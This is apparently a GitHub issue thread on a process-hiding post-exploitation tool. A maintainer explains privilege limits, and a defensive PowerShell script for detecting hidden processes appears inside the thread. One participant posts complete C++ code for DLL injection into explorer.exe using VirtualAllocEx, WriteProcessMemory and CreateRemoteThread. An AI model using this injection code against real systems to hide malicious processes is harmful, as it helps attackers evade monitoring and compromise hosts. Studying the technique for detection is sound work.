M00nRise / ProcessHider

Post-exploitation tool for hiding processes from monitoring applications

without admin rights #5

Closed axe-usat closed 7 years ago

axe-usat commented 7 years ago

I'm trying to learn, for good purposes, if it is possible to inject without admin rights to hide the process, but I think it's not possible?

M00nRise commented 7 years ago

If you're working w/o admin privileges, you'll be able to hide processes only from programs at the same privilege level as you, so if the admin opens Task Manager, he'll see you clearly.
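The privilege boundary described above cuts both ways for a defender: a user-mode hook can only alter the view of processes the attacker was able to inject into, so enumerations taken from separate (ideally elevated) processes give independent views. The following added example, which is not part of ProcessHider or of this thread, performs that cross-view check with three enumeration paths and reports PIDs that are not visible through all of them. Function names are my own; the cmdlets and tasklist.exe are standard Windows components.

```powershell
# Added example (not ProcessHider code): cross-view detection of user-mode
# process hiding. Run from an elevated PowerShell so the hooks a non-admin
# injector can install are below the integrity level of every view.

function Get-ProcessPidSets {
    # View 1: this PowerShell process enumerating via the Win32 API.
    $apiPids = Get-Process | Select-Object -ExpandProperty Id

    # View 2: a separate child process (tasklist.exe) doing its own enumeration.
    # /FO CSV /NH gives one quoted row per process; keep only well-formed rows.
    $taskPids = tasklist.exe /FO CSV /NH |
        Where-Object { $_ -match '^"' } |
        ConvertFrom-Csv -Header 'ImageName','PID','Session','SessionNum','Mem' |
        ForEach-Object { [int]$_.PID }

    # View 3: WMI, answered by the WMI provider host rather than by this process.
    $wmiPids = Get-CimInstance -ClassName Win32_Process |
        Select-Object -ExpandProperty ProcessId

    [pscustomobject]@{ Api = $apiPids; Tasklist = $taskPids; Wmi = $wmiPids }
}

function Find-HiddenProcessCandidates {
    param([pscustomobject]$Sets = (Get-ProcessPidSets))

    # Any PID seen by at least one view but missing from another is suspect.
    # Processes that start or exit between the three snapshots also show up
    # here, so re-run and treat only persistent discrepancies as findings.
    $union = ($Sets.Api + $Sets.Tasklist + $Sets.Wmi) | Sort-Object -Unique
    foreach ($id in $union) {
        $inApi  = $Sets.Api      -contains $id
        $inTask = $Sets.Tasklist -contains $id
        $inWmi  = $Sets.Wmi      -contains $id
        if (-not ($inApi -and $inTask -and $inWmi)) {
            [pscustomobject]@{
                PID      = $id
                Api      = $inApi
                Tasklist = $inTask
                Wmi      = $inWmi
            }
        }
    }
}

Find-HiddenProcessCandidates | Format-Table -AutoSize
```

An empty table means the three views agree; a row with one view reporting $false is the discrepancy a hooked enumeration produces.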

axe-usat commented 7 years ago

One question: how did you convert the injector to be able to inject into two different architectures? I will start a project for an injector on GitHub for white hat reasons.

axe-usat commented 7 years ago

I will start with this code to do my own injector:

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <Tlhelp32.h>
#include <wchar.h>
#include <iostream>
using namespace std;

void error(const char *err);

HANDLE myProc = NULL;

void error(const char *err)
{
    if (myProc != NULL) CloseHandle(myProc);
    printf("%s", err);
    exit(0);
}

int main(int argc, char *argv[])
{
    // Walk the process snapshot until explorer.exe is found
    HANDLE processList = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (processList == INVALID_HANDLE_VALUE) error("[-] Error creating snapshot.\n");
    PROCESSENTRY32 pInfo;
    pInfo.dwSize = sizeof(PROCESSENTRY32);
    BOOL st = Process32First(processList, &pInfo);
    DWORD myPid = 0;
    while (st != FALSE)
    {
        std::wstring name(L"explorer.exe");
        if (wcscmp(pInfo.szExeFile, name.c_str()) == 0)
        {
            myPid = pInfo.th32ProcessID;
            cout << myPid << endl;
            break;
        }
        st = Process32Next(processList, &pInfo);   // FALSE at end of list, ending the loop
    }
    CloseHandle(processList);
    if (myPid == 0) error("[-] explorer.exe not found.\n");

    // Open the process
    printf("[+] Opening process %lu\n", myPid);
    myProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, myPid);
    if (myProc == NULL) error("[-] Error opening process.\n");
    else printf("[+] Process opened.\n");

    // Allocate memory for the argument (DLL path), including the terminating NUL
    char thData[] = "C:/Users/moh/Desktop/dllmain.dll";
    SIZE_T thLen = sizeof(thData);   // strlen(thData) + 1
    LPVOID dirToArg = VirtualAllocEx(myProc, NULL, thLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (dirToArg == NULL)
        error("[-] Error allocating memory for argument.\n");
    else
        printf("[+] Memory allocated for argument (%lu bytes).\n", (unsigned long)thLen);

    // Write the DLL path into the allocated memory
    SIZE_T written = 0;
    if (WriteProcessMemory(myProc, dirToArg, thData, thLen, &written) == 0)
        error("[-] Error writing memory.\n");
    else
        printf("[+] Memory written (arg %lu bytes).\n", (unsigned long)written);

    // Launch a thread that runs LoadLibraryA with the path as its argument
    HANDLE rThread = CreateRemoteThread(myProc, NULL, 0,
        (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary(L"Kernel32.dll"), "LoadLibraryA"),
        dirToArg, 0, NULL);
    if (rThread == NULL)
        error("[-] Error creating thread.\n");
    else
        printf("[+] Thread created.\n");
    CloseHandle(rThread);
    CloseHandle(myProc);
    return 0;
}

But probably I will add support for 32 and 64 bits; for this I ask to start a project.

axe-usat commented 7 years ago

In my case I will do it for a DLL, but I think in your case it is not for a DLL, only an .exe.